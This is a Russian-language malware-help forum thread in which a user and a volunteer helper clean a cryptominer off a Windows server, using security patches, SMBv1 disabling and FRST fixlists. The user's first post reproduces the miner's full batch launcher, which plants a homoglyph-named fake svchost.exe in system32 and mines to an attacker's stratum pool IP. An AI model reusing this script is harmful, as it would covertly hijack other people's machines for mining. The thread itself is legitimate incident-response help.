Показано с 1 по 11 из 11.

TR/BitCoinMiner.Gen (заявка № 216231)

  1. #1
    Junior Member Репутация
    Регистрация
    17.06.2014
    Сообщений
    5
    Вес репутации
    13

    Thumbs up TR/BitCoinMiner.Gen

    Добрый день. На сервере с ОС Windows Server 2008 R2 наблюдается загрузка ЦП до 75% процессом svchost.exe. Удалось выяснить, что запуск процесса происходит автоматически при помощи планировщика заданий. Запускается файл tmpDEAD.bat следующего содержания.
    chcp 1251
    IF NOT EXIST c:\windows\system32\libcurl.dll (copy c:\windows\temp\libcurl.dll c:\windows\system32\libcurl.dll)
    IF NOT EXIST c:\windows\system32\libeay32.dll (copy c:\windows\temp\libeay32.dll c:\windows\system32\libeay32.dll)
    IF NOT EXIST c:\windows\system32\libgcc_s_seh-1.dll (copy c:\windows\temp\libgcc_s_seh-1.dll c:\windows\system32\libgcc_s_seh-1.dll)
    IF NOT EXIST c:\windows\system32\libstdc++-6.dll (copy c:\windows\temp\libstdc++-6.dll c:\windows\system32\libstdc++-6.dll)
    IF NOT EXIST c:\windows\system32\libwinpthread-1.dll (copy c:\windows\temp\libwinpthread-1.dll c:\windows\system32\libwinpthread-1.dll)
    IF NOT EXIST c:\windows\system32\ssleay32.dll (copy c:\windows\temp\ssleay32.dll c:\windows\system32\ssleay32.dll)
    IF NOT EXIST c:\windows\system32\zlib1.dll (copy c:\windows\temp\zlib1.dll c:\windows\system32\zlib1.dll)
    IF NOT EXIST c:\windows\system32\svchоst.exe (copy c:\windows\temp\svchоst.exe c:\windows\system32\svchоst.exe)
    c:\windows\system32\svchоst.exe -u %1 -t %2 -a cryptonight -o stratum+tcp://185.86.150.41:8080
    После отключения задания в планировщике и удаления файлов через некоторое время ситуация повторяется. Также было замечено, что появилась новая учетная запись с правами администратора "Gama". Логи были сняты после завершения процесса svchost и удаления файлов. На сервере стоит NOD32, который на угрозу никак не реагирует. На другом компьютере Avira определила файл svchost.exe как троян TR/BitCoinMiner.Gen. Прошу вашей помощи.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,457
    Вес репутации
    341
    Уважаемый(ая) cas1k, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,408
    Вес репутации
    831
    Устраняйте уязвимость, которую используют в т. ч. нашумевшие шифровальщики WannaCry и Petya:
    http://www.catalog.update.microsoft....px?q=KB4012212
    http://www.catalog.update.microsoft....px?q=KB4012598
    срочно устанавливайте, причём на всех компьютерах в сети, иначе не избавитесь от заразы. А лучше установите все доступные обновления безопасности.

    Если компьютеров под XP нет - отключите протокол SMB версии 1.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    17.06.2014
    Сообщений
    5
    Вес репутации
    13
    Установил обновление системы безопасности для ОС Windows (KB4012212) пока что только на сервере. Отключил SMB при помощи добавления записи в реестр. Прикрепляю архив с отчетами Farbar Recovery Scan Tool.
    Вложения Вложения
    • Тип файла: zip FRST.zip (15.2 Кб, 1 просмотров)

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,408
    Вес репутации
    831
    Запустите FRST/FRST64. В окне программы нажмите комбинацию Ctrl+Y - откроется Блокнот. Скопируйте в него следующий код:
    Код:
    File: C:\Windows\system32\svchоst.exe
    2017-11-10 20:59 - 2017-10-09 20:36 - 001447424 _____ (The OpenSSL Project, hxxp://www.openssl.org/) C:\Windows\system32\libeay32.dll
    2017-11-10 20:59 - 2017-10-09 20:36 - 001185271 _____ C:\Windows\system32\svchоst.exe
    2017-11-10 20:59 - 2017-10-09 20:36 - 000572416 _____ (The cURL library, hxxp://curl.haxx.se/) C:\Windows\system32\libcurl.dll
    2017-11-10 20:59 - 2017-10-09 20:36 - 000314880 _____ (The OpenSSL Project, hxxp://www.openssl.org/) C:\Windows\system32\ssleay32.dll
    2017-11-10 20:59 - 2017-10-09 20:36 - 000089600 _____ C:\Windows\system32\zlib1.dll
    2017-11-10 20:59 - 2017-10-09 20:36 - 000079637 _____ (MingW-W64 Project. All rights reserved.) C:\Windows\system32\libwinpthread-1.dll
    2017-11-10 20:59 - 2017-10-09 20:36 - 000075264 _____ C:\Windows\system32\libgcc_s_seh-1.dll
    2017-10-26 15:25 - 2017-10-26 15:25 - 001016795 _____ C:\Users\Миша\Downloads\Не подтвержден 571670.crdownload
    2017-11-08 17:32 - 2014-01-21 18:17 - 000157952 _____ () C:\Users\Администратор\AppData\Local\Temp\UninstallSer.exe
    FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC] => (Allow) %systemroot%\system32\scshost.exe
    FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC-EndPointMapper] => (Allow) %systemroot%\system32\scshost.exe
    Сохраните (Ctrl+S) и закройте.
    Отключите временно антивирус, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    17.06.2014
    Сообщений
    5
    Вес репутации
    13
    Лог прикреплен к сообщению.
    Вложения Вложения

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,408
    Вес репутации
    831
    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
    Код:
    File: C:\Windows\system32\svchоst.exe
    2017-11-10 20:59 - 2017-10-09 20:36 - 001185271 _____ C:\Windows\system32\svchоst.exe
    2017-11-08 17:32 - 2014-01-21 18:17 - 000157952 _____ () C:\Users\Администратор\AppData\Local\Temp\UninstallSer.exe
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!!
    В FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

    И следите, не появится ли майнер снова. У учётки Программист смените для профлактики пароль на сложный.
    WBR,
    Vadim

  9. #8
    Junior Member Репутация
    Регистрация
    17.06.2014
    Сообщений
    5
    Вес репутации
    13
    Лог прикреплен к сообщению. Майнер не появлялся, пока что все хорошо. Единственное, что насторожило, с 18 до 22 часов в журнале безопасности было зарегистрировано множество сообщений с кодом 4625. Предположительно брутфорс, причем имена учеток менялись с каждой попыткой (ИГОРЬ, ANDREI, HELEN и т.д.). Атака закончилась после перезагрузки сервера. Это последствия заражения или уже совсем другая песня?

    Скрытый текст

    Учетной записи не удалось выполнить вход в систему.

    Субъект:
    ИД безопасности: NULL SID
    Имя учетной записи: -
    Домен учетной записи: -
    Код входа: 0x0

    Тип входа: 3

    Учетная запись, которой не удалось выполнить вход:
    ИД безопасности: NULL SID
    Имя учетной записи: ИГОРЬ
    Домен учетной записи:

    Сведения об ошибке:
    Причина ошибки: Неизвестное имя пользователя или неверный пароль.
    Состояние: 0xc000006d
    Подсостояние: 0xc0000064

    Сведения о процессе:
    Идентификатор процесса вызывающей стороны: 0x0
    Имя процесса вызывающей стороны: -

    Сведения о сети:
    Имя рабочей станции:
    Сетевой адрес источника: -
    Порт источника: -

    Сведения о проверке подлинности:
    Процесс входа: NtLmSsp
    Пакет проверки подлинности: NTLM
    Промежуточные службы: -
    Имя пакета (только NTLM): -
    Длина ключа: 0

    Данное событие возникает при неудачной попытке входа. Оно регистрируется на компьютере, попытка доступа к которому была выполнена.

    Поля "Субъект" указывают на учетную запись локальной системы, запросившую вход. Обычно это служба, например, служба "Сервер", или локальный процесс, такой как Winlogon.exe или Services.exe.

    В поле "Тип входа" указан тип выполненного входа. Наиболее распространенными являются типы 2 (интерактивный) и 3 (сетевой).

    В полях "Сведения о процессе" указано, какая учетная запись и процесс в системе выполнили запрос на вход.

    Поля "Сведения о сети" указывают на источник запроса на удаленный вход. Имя рабочей станции доступно не всегда, и в некоторых случаях это поле может оставаться незаполненным.

    Поля сведений о проверке подлинности содержат подробные данные о конкретном запросе на вход.
    - В поле "Промежуточные службы" указано, какие промежуточные службы участвовали в данном запросе на вход.
    - Поле "Имя пакета" указывает на подпротокол, использованный с протоколами NTLM.
    - Поле "Длина ключа" содержит длину созданного ключа сеанса. Это поле может иметь значение "0", если ключ сеанса не запрашивался.
    Скрыть
    Вложения Вложения

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,408
    Вес репутации
    831
    Систему не заражают, а взламывают.
    Делайте уже свою админскую работу. Почитайте, как настроить файрволл, защититься от брутфорса. Здесь не курсы молодого сисадмина.
    WBR,
    Vadim

  11. #10
    Junior Member Репутация
    Регистрация
    17.06.2014
    Сообщений
    5
    Вес репутации
    13
    Вадим, спасибо большое за помощь! Загвоздка в том, что я программист, а не сисадмин. Что ж, будем повышать компетенцию.

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,408
    Вес репутации
    831
    Удалите папку C:\FRST со всем содержимым.

    Выполните рекомендации после лечения.

  • Уважаемый(ая) cas1k, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Карантин EDF2EF5E62EF97EBEACF3FF1F6A49519 [Trojan.BAT.BitCoinMiner.dg, not-a-virus:RiskTool.Win64.BitCoinMiner.cnz ]
      От CyberHelper в разделе VirusDetector - Бесплатный онлайн-сервис проверки компьютера
      Ответов: 1
      Последнее сообщение: 26.09.2017, 09:15
    2. Ответов: 9
      Последнее сообщение: 01.06.2014, 15:12
    3. Ответов: 5
      Последнее сообщение: 23.05.2014, 12:22
    4. Ответов: 53
      Последнее сообщение: 18.03.2014, 00:44
    5. Подцепил Win32:BitCoinMiner-CA[not-a-virus:RiskTool.Java.BitCoinMiner.a ]
      От FatFighter в разделе Помогите!
      Ответов: 15
      Последнее сообщение: 15.07.2013, 15:26

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00478 seconds with 20 queries